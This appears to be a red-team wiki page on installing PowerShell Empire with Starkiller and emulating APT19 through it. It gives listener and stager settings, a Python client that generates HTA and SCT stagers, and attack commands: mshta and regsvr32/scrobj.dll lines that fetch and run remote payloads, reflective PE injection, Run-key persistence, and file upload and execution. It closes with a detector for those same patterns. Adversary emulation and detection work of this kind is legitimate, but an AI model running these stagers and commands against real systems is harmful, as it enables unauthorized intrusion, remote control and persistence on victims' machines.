# Empire3

A demo of Empire with Starkiller is in this [Red Team Village](https://redteamvillage.io/) event video, where I emulate APT19:

{% embed url="https://www.youtube.com/watch?v=KYCzakkmHqo" %}

## Install Empire

Install on Kali:

```
sudo apt install powershell-empire
```

Install on Ubuntu:

```
cd /opt
sudo git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
sudo ./setup/install.sh
```

If you are installing the newer version of Empire on the SANS Slingshot C2 Matrix Edition VM, there is a small snag: the installer expects Ubuntu 20.04 but Slingshot runs 18.04. In `setup/install.sh`, point the Microsoft package download at the 18.04 repo:

```bash
wget -q https://packages.microsoft.com/config/ubuntu/18.04/packages-microsoft-prod.deb
```

And comment out the version check:

```bash
#if [ $VERSION_ID != "20.04" ]; then
#  echo -e '\x1b[1;31m[!] Ubuntu must be 20.04\x1b[0m' && exit
#fi
```

Download Starkiller if you want a GUI:

```
cd /opt
sudo wget https://github.com/BC-SECURITY/Starkiller/releases/download/v1.0.0/starkiller-1.0.0.AppImage
sudo chmod +x starkiller-1.0.0.AppImage
```

## Run Empire

```bash
sudo empire
```

On Kali:

```bash
sudo powershell-empire
```

## Run Starkiller

Start Empire with its REST API enabled so Starkiller can connect to it (pick the username and password Starkiller will log in with):

```bash
sudo empire --rest --username <user> --password <password>
```

Open Starkiller (the AppImage downloaded above; use the filename of the version you fetched):

```bash
cd /opt
./starkiller-1.0.0.AppImage
```

Login to Starkiller:

* Name: localhost:1337
* Username: `<user>`
* Password: `<password>`

## Emulating TTPs

I will use the SCYTHE adversary emulation plan for APT19 as the example: <https://www.scythe.io/library/threatthursday-apt19>. The technique IDs below are the ones that plan uses (the ATT&CK numbering of the time; several have since been re-mapped to sub-techniques, for example PowerShell T1086 is now T1059.001).

| Tactic | Description |
| --- | --- |
| Description | APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. |
| Goal and Intent | Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks. |
| Command and Control | Commonly Used Port (T1043) - TCP port 80; Standard Application Layer Protocol (T1071) - HTTP; Deobfuscate/Decode Files or Information (T1140); Data Encoding (T1132) - used Base64 to encode communications to the C2 server |
| Initial Access | Spearphishing Attachment (T1193); Spearphishing Link (T1192) |
| Execution | PowerShell (T1086); User Execution; Hidden Window (T1143) - used `-W Hidden` to conceal PowerShell windows by setting the WindowStyle parameter to hidden; Obfuscated Files or Information (T1027) - used Base64 to obfuscate commands and the payload; DLL Side-Loading (T1073) |
| Discovery | System Owner/User Discovery (T1033); System Information Discovery (T1082); System Network Configuration Discovery (T1016) |
| Persistence | Registry Run Keys / Startup Folder (T1060) - establishes persistence by setting the Registry key `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Debug Tools-%LOCALAPPDATA%\` |
| Defense Evasion | Regsvr32 (T1117); Scripting (T1064) - downloaded and launched code within a SCT file to bypass application whitelisting techniques |

### Listeners

Create Listener

```bash
Type: http
Name: http
Host: http://10.0.0.187
Port: 80
BindIP: 10.0.0.187
Jitter: 0.5
StagingKey: georgy
```

### Stagers

Generate Stager HTA:

```bash
Type: windows/hta
Listener: http
Base64: True
Language: powershell
OutFile: /tmp/Resume.hta
```

Generate Stager SCT (saved as launcher.sct so the Defense Evasion step can fetch it):

```bash
Type: windows/launcher_sct
Listener: http
Base64: True
Language: powershell
OutFile: /tmp/launcher.sct
```

Generate Stager DLL:

```bash
Type: windows/dll
Listener: http
Arch: x86
Language: powershell
OutFile: /tmp/launcher.dll

Optional Fields
Obfuscate: True
ObfuscateCommand: Token\String\1
```

Save the stagers to /tmp and serve that directory over HTTP so the target can fetch them:

```bash
cd /tmp
python3 -m http.server 8080   # Python 2: python -m SimpleHTTPServer 8080
```
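Scripting the same setup through the REST API, as an added example that is not part of this page or the Empire project: the client below logs in with the credentials given to `empire --rest`, creates the http listener with the options above, and pulls the HTA and SCT stagers back as text. The endpoint paths (`/api/admin/login`, `/api/listeners/http`, `/api/stagers`), the `?token=` query parameter and the `DefaultJitter` option name are assumed from the Empire 3 REST API documentation rather than taken from this page, which only fixes the port (1337) and the credentials; the transport is injectable so the flow can be exercised without a live server.

```python
import json
import ssl
import urllib.request


class EmpireRest:
    """Minimal client for the Empire 3 REST API (the same API Starkiller talks to).

    Assumed, not taken from this page: the paths /api/admin/login,
    /api/listeners/<type> and /api/stagers, the ?token= parameter, and the
    listener option name DefaultJitter (shown as Jitter in the CLI above).
    """

    def __init__(self, base_url="https://localhost:1337", transport=None):
        self.base_url = base_url.rstrip("/")
        self.token = None
        # transport(method, url, body) -> decoded JSON; injectable for offline testing.
        self.transport = transport or self._https_json

    @staticmethod
    def _https_json(method, url, body):
        # Empire's REST listener presents a self-signed certificate, so verification is
        # skipped here; acceptable on localhost, pin the cert if you expose the API remotely.
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        data = json.dumps(body).encode() if body is not None else None
        req = urllib.request.Request(url, data=data, method=method,
                                     headers={"Content-Type": "application/json"})
        with urllib.request.urlopen(req, context=ctx) as resp:
            return json.load(resp)

    def _call(self, method, path, body=None):
        url = self.base_url + path
        if self.token:
            url += "?token=" + self.token
        return self.transport(method, url, body)

    def login(self, username, password):
        """Exchange the --rest username/password for an API token."""
        resp = self._call("POST", "/api/admin/login",
                          {"username": username, "password": password})
        self.token = resp["token"]
        return self.token

    def create_http_listener(self, name, host, port, bind_ip, jitter, staging_key):
        """Create the http listener described in the Listeners section."""
        options = {
            "Name": name,
            "Host": host,
            "Port": str(port),
            "BindIP": bind_ip,
            "DefaultJitter": str(jitter),
            "StagingKey": staging_key,
        }
        return self._call("POST", "/api/listeners/http", options)

    def generate_stager(self, stager_name, listener, **options):
        """Generate a stager and return its content (the 'Output' field)."""
        body = {"StagerName": stager_name, "Listener": listener}
        body.update(options)
        resp = self._call("POST", "/api/stagers", body)
        return resp[stager_name]["Output"]


if __name__ == "__main__":
    # Listener values from this page; the credentials are whatever was passed to `empire --rest`.
    api = EmpireRest()
    api.login("<user>", "<password>")
    print(api.create_http_listener("http", "http://10.0.0.187", 80, "10.0.0.187", 0.5, "georgy"))
    hta = api.generate_stager("windows/hta", "http", Language="powershell", Base64="True")
    with open("/tmp/Resume.hta", "w") as fh:
        fh.write(hta)
    sct = api.generate_stager("windows/launcher_sct", "http", Language="powershell", Base64="True")
    with open("/tmp/launcher.sct", "w") as fh:
        fh.write(sct)
```

Run it on the C2 host after starting Empire with `--rest`; the stager text it writes to /tmp is the same content the CLI's OutFile option produces, ready for the web server on port 8080.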

### Initial Access

Spearphishing link (T1192): email the target a link to Resume.hta on the web server started above.

### Execution

Execution of the HTA on the target (what the user's click triggers):

```bash
mshta http://10.0.0.187:8080/Resume.hta
```

Migrate to another process with reflective PE injection using the DLL stager generated above, as described in <https://www.bc-security.org/post/reflective-pe-injection-in-windows-10-1909/>:

```bash
ps                                                  # list processes and pick a target PID
usemodule code_execution/invoke_reflectivepeinjection
set ProcID <processID>
set DllPath /tmp/launcher.dll
execute
```

### Discovery

```bash
whoami
usemodule situational_awareness/host/antivirusproduct 
usemodule situational_awareness/host/get_uaclevel 
usemodule situational_awareness/host/winenum
```

### Persistence

```bash
usemodule persistence/userland/registry
set Listener http
execute
```

Verify in regedit under HKCU\Software\Microsoft\Windows\CurrentVersion: the module adds a Run key entry, the same location the APT19 plan lists for persistence (T1060).

### Defense Evasion

Regsvr32 (T1117) with Scripting (T1064): create a shortcut named Chrome whose Target is set to the following, so that regsvr32 silently (`/s`) fetches the SCT stager served on port 8080 via `/i:` and runs it through scrobj.dll without registering anything (`/n /u`):

```bash
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\regsvr32.exe /s /n /u /i:http://10.0.0.187:8080/launcher.sct scrobj.dll"
```
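The detection side of the execution, persistence and defense evasion steps above, as an added example that is not from this page or the Empire project: a small Python detector run over constructed key=value event records (not real telemetry) that mirror the mshta, regsvr32/scrobj.dll, hidden-window PowerShell and Run-key commands on this page, alongside two benign events. It labels each hit with the technique IDs from the plan's table and decodes the Base64/UTF-16LE `-enc` payload (T1140/T1027), which is the first thing an analyst wants from an Empire launcher. The FAKE_LAUNCHER string stands in for a real launcher.

```python
import base64
import re

# Constructed stand-in for an Empire launcher (the real one is far longer); what matters is
# the encoding, which is PowerShell's own for -enc: UTF-16LE text, then Base64.
FAKE_LAUNCHER = "IF($PSVersionTable.PSVersion.Major -ge 3){ <launcher body> }"
ENCODED = base64.b64encode(FAKE_LAUNCHER.encode("utf-16-le")).decode()

# Constructed sample telemetry (not real logs): one key=value record per event, mirroring the
# mshta, regsvr32 and Run-key steps on this page plus two benign events that must not fire.
SAMPLE_EVENTS = [
    r'type=process image="C:\Windows\System32\mshta.exe" cmdline="mshta http://10.0.0.187:8080/Resume.hta"',
    r'type=process image="C:\Windows\System32\cmd.exe" cmdline="cmd.exe /c C:\Windows\System32\regsvr32.exe /s /n /u /i:http://10.0.0.187:8080/launcher.sct scrobj.dll"',
    'type=process image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmdline="powershell -noP -sta -w 1 -enc ' + ENCODED + '"',
    r'type=registry key="HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Debug Tools-C:\Users\georgy\AppData\Local\" value="powershell -w hidden -enc AAAA"',
    r'type=process image="C:\Windows\System32\notepad.exe" cmdline="notepad.exe C:\Users\georgy\notes.txt"',
    r'type=process image="C:\Windows\System32\regsvr32.exe" cmdline="regsvr32.exe /s C:\Program Files\Vendor\plugin.dll"',
]

KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line):
    """Split a key=value record into a dict; quoted values may contain spaces."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in KV.finditer(line)}


def decode_encoded_command(cmdline):
    """Return the PowerShell -enc/-EncodedCommand payload decoded (T1140), or None."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyze(event):
    """Return (label, evidence) findings for one parsed event."""
    findings = []
    if event.get("type") == "process":
        cmd = event.get("cmdline", "")
        low = cmd.lower()
        # mshta pulling an HTA over HTTP: the Resume.hta execution step.
        if "mshta" in low and re.search(r"https?://", low):
            findings.append(("mshta executing a remote HTA (Resume.hta step)", cmd))
        # Squiblydoo: regsvr32 /i:<url> with scrobj.dll; a local /s registration does not match.
        if "regsvr32" in low and "/i:http" in low and "scrobj.dll" in low:
            findings.append(("T1117 Regsvr32 + T1064 Scripting: remote SCT via scrobj.dll", cmd))
        # Empire launcher shape: hidden window (-w 1 or -W Hidden) plus an encoded command.
        if "powershell" in low:
            hidden = re.search(r"-w(?:indowstyle)?\s+(?:hidden|1)\b", low)
            decoded = decode_encoded_command(cmd)
            if hidden and decoded is not None:
                findings.append(("T1086 PowerShell + T1143 Hidden Window + T1027 Base64", decoded))
    elif event.get("type") == "registry":
        key = event.get("key", "")
        if re.search(r"\\currentversion\\run\\", key, re.I):
            findings.append(("T1060 Run key persistence", key))
    return findings


def scan(lines):
    """Run every rule over every record and flatten the findings."""
    return [f for line in lines for f in analyze(parse_event(line))]


if __name__ == "__main__":
    for label, evidence in scan(SAMPLE_EVENTS):
        print(f"[{label}] {evidence}")
```

Real Sysmon process-creation (event 1) and registry value set (event 13) records carry the same fields (CommandLine, TargetObject), so the rules port directly. Empire's launcher emits `-w 1` while the plan's text quotes `-W Hidden`; the window-style rule matches both forms.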

### Upload

```bash
cd C:\Users\<username>
upload /tmp/file
shell C:\Users\<username>\<executable>
```

## Other Resources

* Using Empire with Starkiller: [How to from BC-Security](https://www.bc-security.org/post/an-introduction-to-starkiller)


